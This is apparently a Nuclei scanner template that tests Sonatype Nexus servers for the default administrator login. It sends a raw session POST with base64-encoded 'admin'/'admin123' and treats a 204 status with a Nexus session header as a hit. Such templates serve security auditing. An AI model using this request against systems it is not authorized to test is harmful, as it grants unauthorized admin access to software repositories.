id: nexus-default-login

info:
  name: Nexus Default Login
  author: pikpikcu
  severity: high
  tags: nexus,default-login

requests:
  - raw:
      - |
        POST /service/rapture/session HTTP/1.1
        Host: {{Hostname}}
        X-Nexus-UI: true
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{base64(username)}}&password={{base64(password)}}

    payloads:
      username:
        - admin
      password:
        - admin123
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 204
      - type: word
        words:
          - "Server: Nexus"
          - "NXSESSIONID"
        part: header
        condition: and
